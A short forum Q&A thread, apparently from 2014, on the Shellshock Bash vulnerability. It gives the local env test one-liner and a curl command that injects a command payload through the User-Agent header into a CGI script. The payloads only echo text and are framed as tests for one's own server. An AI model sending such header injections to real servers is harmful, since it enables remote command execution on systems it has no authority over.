Odds are that you're already aware of the newly discovered Bash bug. It can be tested using env x='() { :;}; echo vulnerable' bash -c "echo this is a test".
What yet I haven't understand is, what are the real attack scenarios of this vulnerability. I have read that most likely it's going to be HTTP requests, but how?
wget, trycurl -A '() { :;}; /bin/bash -c "echo vulnerable"' http://example.com/some-cgi-script– user193130 Sep 25 '14 at 15:27http://example.com/script.cgi, replaceexample.comand/script.cgiwith your own address and cgi script(the script located on the server, not your computer) – Karl Morrison Oct 02 '14 at 06:07